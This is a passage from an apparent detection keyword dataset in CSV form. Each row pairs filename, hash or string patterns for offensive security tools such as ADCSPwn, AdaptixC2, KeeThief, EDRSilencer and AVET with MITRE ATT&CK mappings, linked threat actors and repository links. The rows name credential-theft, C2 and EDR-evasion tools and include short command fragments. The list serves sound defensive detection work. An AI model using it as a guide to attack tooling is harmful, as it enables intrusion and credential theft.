Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","33226" "*ad97557e81bf680c9c796b2673a34562a0f80cb27b88bf53fe20a9a281723e07*",".{0,1000}ad97557e81bf680c9c796b2673a34562a0f80cb27b88bf53fe20a9a281723e07.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or 
newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","33227" "*ad9d0bd619aae9231977ed9b002981bf272afb9a93d198406296a7b4f7d28542*",".{0,1000}ad9d0bd619aae9231977ed9b002981bf272afb9a93d198406296a7b4f7d28542.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","33229" "*AD9F3A60-C492-4823-8F24-6F4854E7CBF5*",".{0,1000}AD9F3A60\-C492\-4823\-8F24\-6F4854E7CBF5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#GUIDproject","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33230" "*ADACLScan.ps1*",".{0,1000}ADACLScan\.ps1.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","33231" "*ADACLScanner*",".{0,1000}ADACLScanner.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access
control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","33232" "*ADACLScanner-master*",".{0,1000}ADACLScanner\-master.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","33233" "*adalanche analyze*",".{0,1000}adalanche\sanalyze.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","33234" "*adalanche collect*",".{0,1000}adalanche\scollect.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","33235" "*adalanche-*.exe*",".{0,1000}adalanche\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","33236" 
"*Adalanche.git*",".{0,1000}Adalanche\.git.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","33237" "*adalanche-collector*",".{0,1000}adalanche\-collector.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","33238" "*Adamantium-Thief-master*",".{0,1000}Adamantium\-Thief\-master.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","33239" "*adaptivethreat/Empire*",".{0,1000}adaptivethreat\/Empire.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","33240" "*AdaptixClient/AdaptixClient*",".{0,1000}AdaptixClient\/AdaptixClient.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 -
T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","0","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","33241" "*Adaptix-Framework/AdaptixC2*",".{0,1000}Adaptix\-Framework\/AdaptixC2.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","1","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","33242" "*AdaptixServer -p*",".{0,1000}AdaptixServer\s\-p.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","0","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","33243" "*AdaptixServer/adaptixserver*",".{0,1000}AdaptixServer\/adaptixserver.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","0","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","33244" "*adbed7685fc512f48cf0edb1eb0df16fed97c52d5eab0fe70e88286c47d53e3d*",".{0,1000}adbed7685fc512f48cf0edb1eb0df16fed97c52d5eab0fe70e88286c47d53e3d.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass 
trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","33245" "*ADCEEFBA-CE43-4239-8AE8-7D8D43E66BB1*",".{0,1000}ADCEEFBA\-CE43\-4239\-8AE8\-7D8D43E66BB1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#GUIDproject","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","33247" "*ADCollector.exe*",".{0,1000}ADCollector\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","33248" "*ADCollector.exe*",".{0,1000}ADCollector\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33249" "*ADCollector3.csproj*",".{0,1000}ADCollector3\.csproj.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","33250" "*adconnectdump.py*",".{0,1000}adconnectdump\.py.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","33251" "*adconnectdump-master*",".{0,1000}adconnectdump\-master.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","33252" "*ADCS Server location identified on IP *",".{0,1000}ADCS\sServer\slocation\sidentified\son\sIP\s.{0,1000}","offensive_tool_keyword","adcshunter","Uses 
rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","0","N/A","N/A","7","1","80","7","2024-09-13T12:50:50Z","2023-12-14T14:31:05Z","33253" "*adcs_enum.*",".{0,1000}adcs_enum\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","33254" "*adcs_enum_com.*",".{0,1000}adcs_enum_com\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","33255" 
"*adcs_enum_com2.*",".{0,1000}adcs_enum_com2\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","33256" "*ADCS_Maybe_ESC8_HTTPS_Vulnerable.txt*",".{0,1000}ADCS_Maybe_ESC8_HTTPS_Vulnerable\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - 
TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","33257" "*adcsattack.py*",".{0,1000}adcsattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","33258" "*ADCSCoercePotato.cpp*",".{0,1000}ADCSCoercePotato\.cpp.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","33259" "*ADCSCoercePotato.exe*",".{0,1000}ADCSCoercePotato\.exe.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","33260" 
"*ADCSCoercePotato.sln*",".{0,1000}ADCSCoercePotato\.sln.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","33261" "*ADCSCoercePotato.vcxproj*",".{0,1000}ADCSCoercePotato\.vcxproj.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","33262" "*ADCSCoercePotato\n- @decoder_it 2024\*",".{0,1000}ADCSCoercePotato\\n\-\s\@decoder_it\s2024\\.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","33263" "*adcshunter.py*",".{0,1000}adcshunter\.py.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","N/A","7","1","80","7","2024-09-13T12:50:50Z","2023-12-14T14:31:05Z","33264" "*adcskiller.py*",".{0,1000}adcskiller\.py.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. 
It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002 - T1649","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","N/A","8","710","70","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z","33265" "*ADCSPwn.csproj*",".{0,1000}ADCSPwn\.csproj.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","33266" "*ADCSPwn.exe*",".{0,1000}ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","33267" "*ADCSPwn.exe*",".{0,1000}ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","33268" "*ADCSPwn.exe*",".{0,1000}ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33269" "*ADCSPwn.sln*",".{0,1000}ADCSPwn\.sln.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","33270" "*ADCSPwn.zip*",".{0,1000}ADCSPwn\.zip.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","33271" "*ADCSPwn-master*",".{0,1000}ADCSPwn\-master.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege 
Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","33272" "*adcsync.py -*",".{0,1000}adcsync\.py\s\-.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","33273" "*Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process*",".{0,1000}Add\sWFP\sfilters\sto\sblock\sthe\sIPv4\sand\sIPv6\soutbound\straffic\sof\sa\sspecific\sprocess.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","33274" "*Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes*",".{0,1000}Add\sWFP\sfilters\sto\sblock\sthe\sIPv4\sand\sIPv6\soutbound\straffic\sof\sall\sdetected\sEDR\sprocesses.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","33275" "*add_evasion check_fast_forwarding*",".{0,1000}add_evasion\scheck_fast_forwarding.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. 
For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33276" "*add_evasion computation_fibonacci *",".{0,1000}add_evasion\scomputation_fibonacci\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33277" "*add_evasion computation_timed_fibonacci*",".{0,1000}add_evasion\scomputation_timed_fibonacci.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33278" "*add_evasion evasion_by_sleep *",".{0,1000}add_evasion\sevasion_by_sleep\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. 
